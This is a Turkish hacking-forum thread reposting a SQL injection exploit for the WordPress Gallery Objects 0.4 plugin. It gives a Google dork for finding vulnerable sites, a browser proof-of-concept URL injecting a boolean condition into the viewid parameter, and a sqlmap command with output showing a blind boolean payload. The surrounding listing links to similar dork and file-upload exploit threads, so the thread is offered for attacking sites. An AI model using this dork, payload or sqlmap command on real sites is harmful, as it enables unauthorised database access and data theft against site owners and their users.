Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Galeri Nesneleri 0.4 SQL Injection Açığı
#1
Kod:
######################
# Exploit Title : Wordpress Gallery Objects 0.4 SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://galleryobjects.com/

# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip

# Dork Google: inurl:/admin-ajax.php?action=go_view_object            

# Date : 2014-07-18

# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0



######################


Poc via Browser:

http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html


sqlmap:

sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

---
Place: GET
Parameter: viewid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/34105/
www.deccal.org


Beğenenler:
#2
eyvallah
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 75 4,405 Dün, Saat: 18:14
Son Yorum: TiqReGo
  MyBB Forum usercp.php?action=avatar Açığı KingSkrupellos 232 11,998 Dün, Saat: 07:32
Son Yorum: Efetimi
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 195 05-12-2016, Saat: 18:42
Son Yorum: the_zizil
  UpL Image Board_2 Content Dosya Yükleme Açığı KingSkrupellos 5 110 04-12-2016, Saat: 12:21
Son Yorum: antisecureman
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 540 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
Anahtar Kelimeler

WordPress Galeri Nesneleri 0.4 SQL Injection Açığı indir, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Videosu, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Online izle, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Bedava indir, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Yükle, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Hakkında, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Nedir, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Free indir, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Oyunu, WordPress Galeri Nesneleri 0.4 SQL Injection Açığı Download


1 Ziyaretçi